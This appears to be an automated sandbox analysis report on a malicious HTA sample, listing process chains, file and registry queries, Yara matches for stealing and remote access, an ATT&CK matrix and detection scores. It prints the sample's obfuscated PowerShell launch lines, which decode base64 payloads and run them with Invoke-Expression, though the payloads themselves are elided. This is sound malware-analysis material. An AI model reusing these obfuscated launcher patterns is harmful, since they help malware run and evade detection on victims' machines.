                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'<base64 payload elided>'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '<base64 payload elided>';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 111 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 111 Scripting | 211 Process Injection | 1 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  [Behavior graph, ID: 1566470. Sample: seemebestgoodluckthings.hta; Startdate: 02/12/2024; Architecture: WINDOWS; Score: 100. Process tree: mshta.exe started cmd.exe, conhost.exe and aspnet_compiler.exe; cmd.exe started powershell.exe and conhost.exe; powershell.exe started wscript.exe and csc.exe; wscript.exe started powershell.exe; csc.exe started cvtres.exe.]

                  Source | Detection | Scanner | Label | Link
                  seemebestgoodluckthings.hta | 16% | ReversingLabs | Script-WScript.Trojan.Asthma |
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  https://go.StorageJob.cdxml27 | 0% | Avira URL Cloud | safe |
                  http://www.microsoft.co? | 0% | Avira URL Cloud | safe |
                  https://go.S | 0% | Avira URL Cloud | safe |
